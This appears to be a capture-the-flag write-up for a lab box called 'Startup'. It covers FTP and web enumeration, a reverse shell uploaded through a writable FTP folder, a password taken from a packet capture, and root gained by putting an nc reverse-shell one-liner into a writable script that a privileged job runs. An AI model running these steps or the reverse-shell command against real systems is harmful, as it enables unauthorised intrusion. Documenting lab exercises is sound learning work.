Startup
Target IP: 10.10.80.45
Make the nmap scan and got 3 open ports.
21/ftp, anonymous login allowed. 22/tcp open ssh 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Let's start from the checking the ftp server. I connected to the ftp server found there 3 files.
The ftp folder is empty
there is nothing interesting in the .test.log file
Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus. This is content of the notice.txt. Who is Maya?
I did binwalk to the image and it looks like there is something hidden.
Looks like endless cycle...(
Image metadata. Interesting is that the file extension is jpg, but file type is png.
Strings - Nothing
Looks like we did not find any flags on the ftp server :(
Let's look at the site.
I am going to run gobuster to find out if there is any hidden folders.
gobuster dir -u http://$IP/ -w /usr/share/wordlists/dirb/common.txt
The files folder. Same content that we found on the ftp server.
If we can upload files to the ftp server, and access it in the files folder, it is good idea to upload there reverse-shell.
There is a problem. I cannot upload files. But, I can upload files to the ftp folder :)
Dont forget to run netcat.
nc -lvnp 4444
Hopefully it's gonna work.
And, here we go. We've got the reverse-shell.
Let's use this tool to make the shell a little bit better. https://ezprompt.net/
export PS1="\[\e[32m\]\u\[\e[m\]\[\e[32m\]@\[\e[m\]\[\e[32m\]\h\[\e[m\]\[\e[32m\][\[\e[m\]\[\e[32m\]\d\[\e[m\]\[\e[32m\]]\[\e[m\] "
That does not help so I used ChatGPT and got this:
export PS1='\[\e[1;32m\]\u@\h:\[\e[1;34m\]\w\[\e[0m\]\$ '
Don't know why but that does not work in this case.
Forget about the shell. Let's look for the the flags.
We have got the recipe and the secret ingredient.
We cannot go to root. :(
We need to escalate our privileges. We cannot got to any user's folder. But we found a user lennie. We can try to brute force his ssh password.
Looks like we can read /etc/passwd.
We found the .pcapng file in the incidents folder. Let's look at this file. Looks like someone already tried to hack this system.
Well, we have got some password:
c4ntg3t3n0ughsp1c3
There you go! Now we can connect to the server via ssh.
btw, another way to make the pretty shell.
python -c "import pty;pty.spawn('/bin/bash')"
Interesting file: /etc/print.sh
We can try to change this file: /etc/vsftpd.conf
anon_root=/var/www/html/files
We can try to edit this file:
/usr/share/doc/openssh-client/examples/sshd_config
No one of the files we can edit.
linpeas.sh found this:
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/etc/print.sh
Looking at the planner.sh and reading the file we can see that we can execute it but nothing else and we can see that the planner.sh executes print.sh and we can edit the print.sh script. So let's go ahead and put reverse-shell into print.sh.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.38.40 1111 >/tmp/f
And here we go! We have the root reverse shell.
Now, we can go ahead and read the flag.